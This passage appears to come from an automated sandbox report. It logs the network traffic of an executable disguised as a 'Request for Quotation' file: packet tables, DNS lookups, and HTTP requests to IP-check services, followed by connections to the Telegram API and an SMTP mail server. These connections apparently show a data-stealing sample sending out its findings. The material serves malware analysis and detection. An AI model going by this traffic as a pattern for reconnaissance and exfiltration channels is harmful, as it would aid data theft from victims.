                                                                                    Oct 8, 2024 15:10:21.560033083 CEST44349752188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:21.560077906 CEST49752443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:21.589440107 CEST49752443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:21.593852997 CEST4973780192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:21.598620892 CEST8049737193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:21.697854996 CEST8049737193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:21.700737000 CEST49761443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:21.700773001 CEST44349761188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:21.700843096 CEST49761443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:21.701208115 CEST49761443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:21.701221943 CEST44349761188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:21.752732038 CEST4973780192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:22.180902958 CEST44349761188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:22.186881065 CEST49761443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:22.186893940 CEST44349761188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:22.337570906 CEST44349761188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:22.337671041 CEST44349761188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:22.337762117 CEST49761443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:22.338675022 CEST49761443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:22.342922926 CEST4973780192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:22.343899012 CEST4976580192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:22.348457098 CEST8049737193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:22.348594904 CEST4973780192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:22.348965883 CEST8049765193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:22.349092960 CEST4976580192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:22.349164963 CEST4976580192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:22.354020119 CEST8049765193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:22.813498020 CEST8049765193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:22.827013016 CEST49769443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:22.827050924 CEST44349769188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:22.827393055 CEST49769443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:22.827908039 CEST49769443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:22.827920914 CEST44349769188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:22.861975908 CEST4976580192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:23.296911001 CEST44349769188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:23.298916101 CEST49769443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:23.298937082 CEST44349769188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:23.435359001 CEST44349769188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:23.435463905 CEST44349769188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:23.435518026 CEST49769443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:23.436283112 CEST49769443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:23.441582918 CEST4977480192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:23.446579933 CEST8049774193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:23.446659088 CEST4977480192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:23.446795940 CEST4977480192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:23.451694965 CEST8049774193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:24.944582939 CEST8049774193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:24.946276903 CEST49784443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:24.946322918 CEST44349784188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:24.946451902 CEST49784443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:24.946877003 CEST49784443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:24.946891069 CEST44349784188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:24.987006903 CEST4977480192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:25.438393116 CEST44349784188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:25.443425894 CEST49784443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:25.443449974 CEST44349784188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:25.617048025 CEST44349784188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:25.617290974 CEST44349784188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:25.617666006 CEST49784443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:25.618393898 CEST49784443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:25.628616095 CEST4977480192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:25.646193981 CEST4978980192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:25.940124989 CEST4977480192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:26.549527884 CEST4977480192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:26.658863068 CEST4978980192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:26.680949926 CEST8049789193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:26.680962086 CEST8049774193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:26.680969954 CEST8049774193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:26.681013107 CEST8049789193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:26.681072950 CEST4978980192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:26.681096077 CEST4978980192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:26.681225061 CEST8049774193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:26.681273937 CEST4978980192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:26.681277990 CEST4977480192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:26.687836885 CEST8049789193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:27.142234087 CEST8049789193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:27.144013882 CEST49795443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:27.144073963 CEST44349795188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:27.144172907 CEST49795443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:27.144498110 CEST49795443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:27.144515991 CEST44349795188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:27.190191984 CEST4978980192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:27.624716997 CEST44349795188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:27.626564026 CEST49795443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:27.626589060 CEST44349795188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:27.780744076 CEST44349795188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:27.780844927 CEST44349795188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:27.780913115 CEST49795443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:27.781480074 CEST49795443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:27.785340071 CEST4978980192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:27.786765099 CEST4980180192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:27.790950060 CEST8049789193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:27.791047096 CEST4978980192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:27.791722059 CEST8049801193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:27.791800976 CEST4980180192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:27.791939020 CEST4980180192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:27.796896935 CEST8049801193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:28.267467022 CEST8049801193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:28.269057989 CEST49803443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:28.269068003 CEST44349803188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:28.269150019 CEST49803443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:28.269397020 CEST49803443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:28.269403934 CEST44349803188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:28.315150976 CEST4980180192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:28.727138042 CEST44349803188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:28.728998899 CEST49803443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:28.729062080 CEST44349803188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:28.872194052 CEST44349803188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:28.872296095 CEST44349803188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:28.872411013 CEST49803443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:28.873317957 CEST49803443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:28.930773020 CEST4980180192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:28.932457924 CEST4980880192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:28.936047077 CEST8049801193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:28.936108112 CEST4980180192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:28.937333107 CEST8049808193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:28.937419891 CEST4980880192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:28.937613964 CEST4980880192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:28.942585945 CEST8049808193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:29.397955894 CEST8049808193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:29.399715900 CEST49812443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:29.399772882 CEST44349812188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:29.399878979 CEST49812443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:29.400171995 CEST49812443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:29.400190115 CEST44349812188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:29.440156937 CEST4980880192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:29.869188070 CEST44349812188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:29.871037960 CEST49812443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:29.871068001 CEST44349812188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:29.998876095 CEST44349812188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:29.998979092 CEST44349812188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:29.999042034 CEST49812443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:29.999609947 CEST49812443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:30.003299952 CEST4980880192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:30.004601955 CEST4981680192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:30.008743048 CEST8049808193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:30.008822918 CEST4980880192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:30.009464025 CEST8049816193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:30.009545088 CEST4981680192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:30.009635925 CEST4981680192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:30.014746904 CEST8049816193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:30.488385916 CEST8049816193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:30.490056992 CEST49821443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:30.490091085 CEST44349821188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:30.490194082 CEST49821443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:30.490492105 CEST49821443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:30.490504026 CEST44349821188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:30.533860922 CEST4981680192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:30.950031042 CEST44349821188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:30.952866077 CEST49821443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:30.952897072 CEST44349821188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:31.087816954 CEST44349821188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:31.087922096 CEST44349821188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:31.088011980 CEST49821443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:31.088541031 CEST49821443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:31.092031002 CEST4981680192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:31.092669964 CEST4982880192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:31.097417116 CEST8049816193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:31.097500086 CEST4981680192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:31.097645044 CEST8049828193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:31.097719908 CEST4982880192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:31.097845078 CEST4982880192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:31.103023052 CEST8049828193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:31.552058935 CEST8049828193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:31.553697109 CEST49831443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:31.553731918 CEST44349831188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:31.553801060 CEST49831443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:31.554191113 CEST49831443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:31.554202080 CEST44349831188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:31.596373081 CEST4982880192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:32.015624046 CEST44349831188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:32.017699003 CEST49831443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:32.017726898 CEST44349831188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:32.163235903 CEST44349831188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:32.163562059 CEST44349831188.114.96.3192.168.2.6
                                                                                    Oct 8, 2024 15:10:32.163618088 CEST49831443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:32.163984060 CEST49831443192.168.2.6188.114.96.3
                                                                                    Oct 8, 2024 15:10:32.180023909 CEST4982880192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:32.185401917 CEST8049828193.122.130.0192.168.2.6
                                                                                    Oct 8, 2024 15:10:32.185461998 CEST4982880192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:32.188738108 CEST49838443192.168.2.6149.154.167.220
                                                                                    Oct 8, 2024 15:10:32.188772917 CEST44349838149.154.167.220192.168.2.6
                                                                                    Oct 8, 2024 15:10:32.188838959 CEST49838443192.168.2.6149.154.167.220
                                                                                    Oct 8, 2024 15:10:32.189455032 CEST49838443192.168.2.6149.154.167.220
                                                                                    Oct 8, 2024 15:10:32.189464092 CEST44349838149.154.167.220192.168.2.6
                                                                                    Oct 8, 2024 15:10:32.834947109 CEST44349838149.154.167.220192.168.2.6
                                                                                    Oct 8, 2024 15:10:32.835416079 CEST49838443192.168.2.6149.154.167.220
                                                                                    Oct 8, 2024 15:10:32.837341070 CEST49838443192.168.2.6149.154.167.220
                                                                                    Oct 8, 2024 15:10:32.837348938 CEST44349838149.154.167.220192.168.2.6
                                                                                    Oct 8, 2024 15:10:32.837585926 CEST44349838149.154.167.220192.168.2.6
                                                                                    Oct 8, 2024 15:10:32.839401960 CEST49838443192.168.2.6149.154.167.220
                                                                                    Oct 8, 2024 15:10:32.887403965 CEST44349838149.154.167.220192.168.2.6
                                                                                    Oct 8, 2024 15:10:33.089235067 CEST44349838149.154.167.220192.168.2.6
                                                                                    Oct 8, 2024 15:10:33.089303017 CEST44349838149.154.167.220192.168.2.6
                                                                                    Oct 8, 2024 15:10:33.089540005 CEST49838443192.168.2.6149.154.167.220
                                                                                    Oct 8, 2024 15:10:33.097348928 CEST49838443192.168.2.6149.154.167.220
                                                                                    Oct 8, 2024 15:10:38.287677050 CEST4976580192.168.2.6193.122.130.0
                                                                                    Oct 8, 2024 15:10:38.470689058 CEST49875587192.168.2.6208.91.199.223
                                                                                    Oct 8, 2024 15:10:38.475651979 CEST58749875208.91.199.223192.168.2.6
                                                                                    Oct 8, 2024 15:10:38.475843906 CEST49875587192.168.2.6208.91.199.223
                                                                                    Oct 8, 2024 15:10:39.161602974 CEST58749875208.91.199.223192.168.2.6
                                                                                    Oct 8, 2024 15:10:39.162200928 CEST49875587192.168.2.6208.91.199.223
                                                                                    Oct 8, 2024 15:10:39.167366028 CEST58749875208.91.199.223192.168.2.6
                                                                                    Oct 8, 2024 15:10:39.316873074 CEST58749875208.91.199.223192.168.2.6
                                                                                    Oct 8, 2024 15:10:39.318073988 CEST49875587192.168.2.6208.91.199.223
                                                                                    Oct 8, 2024 15:10:39.323050022 CEST58749875208.91.199.223192.168.2.6
                                                                                    Oct 8, 2024 15:10:39.475977898 CEST58749875208.91.199.223192.168.2.6
                                                                                    Oct 8, 2024 15:10:39.476366997 CEST49875587192.168.2.6208.91.199.223
                                                                                    Oct 8, 2024 15:10:39.481429100 CEST58749875208.91.199.223192.168.2.6
                                                                                    Oct 8, 2024 15:10:39.638111115 CEST58749875208.91.199.223192.168.2.6
                                                                                    Oct 8, 2024 15:10:39.638370991 CEST49875587192.168.2.6208.91.199.223
                                                                                    Oct 8, 2024 15:10:39.643490076 CEST58749875208.91.199.223192.168.2.6
                                                                                    Oct 8, 2024 15:10:39.795197964 CEST58749875208.91.199.223192.168.2.6
                                                                                    Oct 8, 2024 15:10:39.795408010 CEST49875587192.168.2.6208.91.199.223
                                                                                    Oct 8, 2024 15:10:39.800461054 CEST58749875208.91.199.223192.168.2.6
                                                                                    Oct 8, 2024 15:10:39.982266903 CEST58749875208.91.199.223192.168.2.6
                                                                                    Oct 8, 2024 15:10:39.986442089 CEST49875587192.168.2.6208.91.199.223
                                                                                    Oct 8, 2024 15:10:39.992214918 CEST58749875208.91.199.223192.168.2.6
                                                                                    Oct 8, 2024 15:10:39.992264986 CEST49875587192.168.2.6208.91.199.223
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Oct 8, 2024 15:10:17.906429052 CEST5875553192.168.2.61.1.1.1
                                                                                    Oct 8, 2024 15:10:17.914171934 CEST53587551.1.1.1192.168.2.6
                                                                                    Oct 8, 2024 15:10:20.776580095 CEST5115753192.168.2.61.1.1.1
                                                                                    Oct 8, 2024 15:10:20.784600019 CEST53511571.1.1.1192.168.2.6
                                                                                    Oct 8, 2024 15:10:22.814915895 CEST6150953192.168.2.61.1.1.1
                                                                                    Oct 8, 2024 15:10:22.826201916 CEST53615091.1.1.1192.168.2.6
                                                                                    Oct 8, 2024 15:10:32.180744886 CEST6361153192.168.2.61.1.1.1
                                                                                    Oct 8, 2024 15:10:32.188071012 CEST53636111.1.1.1192.168.2.6
                                                                                    Oct 8, 2024 15:10:38.460053921 CEST4987153192.168.2.61.1.1.1
                                                                                    Oct 8, 2024 15:10:38.469801903 CEST53498711.1.1.1192.168.2.6
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Oct 8, 2024 15:10:17.906429052 CEST192.168.2.61.1.1.10x5f09Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                    Oct 8, 2024 15:10:20.776580095 CEST192.168.2.61.1.1.10x3fd1Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                    Oct 8, 2024 15:10:22.814915895 CEST192.168.2.61.1.1.10x5dd8Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                    Oct 8, 2024 15:10:32.180744886 CEST192.168.2.61.1.1.10x6a93Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                    Oct 8, 2024 15:10:38.460053921 CEST192.168.2.61.1.1.10xe928Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Oct 8, 2024 15:10:12.957684040 CEST1.1.1.1192.168.2.60xcaaeNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                    Oct 8, 2024 15:10:12.957684040 CEST1.1.1.1192.168.2.60xcaaeNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                    Oct 8, 2024 15:10:17.914171934 CEST1.1.1.1192.168.2.60x5f09No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Oct 8, 2024 15:10:17.914171934 CEST1.1.1.1192.168.2.60x5f09No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                    Oct 8, 2024 15:10:17.914171934 CEST1.1.1.1192.168.2.60x5f09No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                    Oct 8, 2024 15:10:17.914171934 CEST1.1.1.1192.168.2.60x5f09No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                    Oct 8, 2024 15:10:17.914171934 CEST1.1.1.1192.168.2.60x5f09No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                    Oct 8, 2024 15:10:17.914171934 CEST1.1.1.1192.168.2.60x5f09No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                    Oct 8, 2024 15:10:20.784600019 CEST1.1.1.1192.168.2.60x3fd1No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                    Oct 8, 2024 15:10:20.784600019 CEST1.1.1.1192.168.2.60x3fd1No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                    Oct 8, 2024 15:10:22.826201916 CEST1.1.1.1192.168.2.60x5dd8No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                    Oct 8, 2024 15:10:22.826201916 CEST1.1.1.1192.168.2.60x5dd8No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                    Oct 8, 2024 15:10:32.188071012 CEST1.1.1.1192.168.2.60x6a93No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                    Oct 8, 2024 15:10:38.469801903 CEST1.1.1.1192.168.2.60xe928No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                    Oct 8, 2024 15:10:38.469801903 CEST1.1.1.1192.168.2.60xe928No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                    Oct 8, 2024 15:10:38.469801903 CEST1.1.1.1192.168.2.60xe928No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                    Oct 8, 2024 15:10:38.469801903 CEST1.1.1.1192.168.2.60xe928No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                    • reallyfreegeoip.org
                                                                                    • api.telegram.org
                                                                                    • checkip.dyndns.org
                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.649737193.122.130.0806456C:\Users\user\Desktop\Request for Quotation Plug Valve.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 8, 2024 15:10:17.925327063 CEST151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Oct 8, 2024 15:10:20.556535959 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Tue, 08 Oct 2024 13:10:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 0ae13e58f9c4bad2fb0c8ff59d745102
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                    Oct 8, 2024 15:10:20.556983948 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Tue, 08 Oct 2024 13:10:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 0ae13e58f9c4bad2fb0c8ff59d745102
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                    Oct 8, 2024 15:10:20.557005882 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Tue, 08 Oct 2024 13:10:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 0ae13e58f9c4bad2fb0c8ff59d745102
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                    Oct 8, 2024 15:10:20.589606047 CEST127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Oct 8, 2024 15:10:20.693608999 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Tue, 08 Oct 2024 13:10:20 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 9ee1f4e96a282165e1335f64812f5506
